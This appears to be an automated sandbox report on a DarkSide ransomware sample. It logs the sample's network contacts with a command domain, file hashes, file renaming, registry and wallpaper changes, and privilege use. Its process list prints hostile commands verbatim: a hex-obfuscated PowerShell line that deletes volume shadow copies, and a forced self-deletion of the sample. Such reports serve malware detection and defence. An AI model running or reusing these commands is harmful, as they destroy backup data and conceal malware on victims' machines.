US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
DE 3.64.163.50:443 securebestapp20.com tcp
US 8.8.8.8:53 www.microsoft.com udp

Files

memory/1964-55-0x0000000076511000-0x0000000076513000-memory.dmp

memory/276-56-0x000007FEFC151000-0x000007FEFC153000-memory.dmp

memory/276-57-0x000007FEF28A0000-0x000007FEF33FD000-memory.dmp

memory/276-59-0x0000000002840000-0x0000000002842000-memory.dmp

memory/276-60-0x0000000002842000-0x0000000002844000-memory.dmp

memory/276-61-0x0000000002844000-0x0000000002847000-memory.dmp

memory/276-58-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

memory/276-62-0x000000000284B000-0x000000000286A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1326ecf03580cc68f9ad9edf5b6eec0e
SHA1 718f7344d7f6415735cbab52fe3dd16d5ca7ef3a
SHA256 643ed5d3ef0eb8014be2b80b5f59221ad2bcb3d4925c1cf0fd359f3d9e1a7fab
SHA512 fcc28b87dd079bcd2a575170d0164bc351bf25d1209527b678eced96a66bb9b72c0750ffebb5ebe6d4714745b4d446dc95353afa0e72d9408202dd012156134a

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-31 05:59

Reported

2022-01-31 07:35

Platform

win10-en-20211208

Max time kernel

122s

Max time network

166s

Command Line

"C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\InvokeFormat.crw => C:\Users\Admin\Pictures\InvokeFormat.crw.82ee2099 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File opened for modification C:\Users\Admin\Pictures\InvokeFormat.crw.82ee2099 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File renamed C:\Users\Admin\Pictures\PublishInstall.png => C:\Users\Admin\Pictures\PublishInstall.png.82ee2099 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File opened for modification C:\Users\Admin\Pictures\PublishInstall.png.82ee2099 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\82ee2099.BMP" C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\82ee2099.BMP" C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099\ = "82ee2099" C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\82ee2099.ico" C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe

"C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\ADCB91~1.EXE >> NUL

Network

Country Destination Domain Proto
US 72.21.91.29:80 tcp
US 52.109.12.18:443 tcp
US 8.8.8.8:53 securebestapp20.com udp
DE 3.64.163.50:443 securebestapp20.com tcp
DE 3.64.163.50:443 securebestapp20.com tcp
DE 3.64.163.50:443 securebestapp20.com tcp
US 8.8.8.8:53 13.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.1.127.10.in-addr.arpa udp
DE 3.64.163.50:443 securebestapp20.com tcp

Files

memory/2288-123-0x000001CFF72A0000-0x000001CFF72C2000-memory.dmp

memory/2288-129-0x000001CFF4FF3000-0x000001CFF4FF5000-memory.dmp

memory/2288-128-0x000001CFF4FF0000-0x000001CFF4FF2000-memory.dmp

memory/2288-130-0x000001CFF7450000-0x000001CFF74C6000-memory.dmp

memory/2288-142-0x000001CFF4FF6000-0x000001CFF4FF8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fa208d0582c9854749d4d38164e606b5
SHA1 87c6d1b27c6f46cecb1de615c3e7b11796b8086a
SHA256 400de0823331d82a134ff8e23fd598be515c4983f275fd5f3116f660b39c9e94
SHA512 d52aa174f73cce4735a4422c518176c28981aa4e48294d9e82423cc88eeb9375a0217014c0adb94a1c21137711164fac557db192df620be8545d583dd0fbe530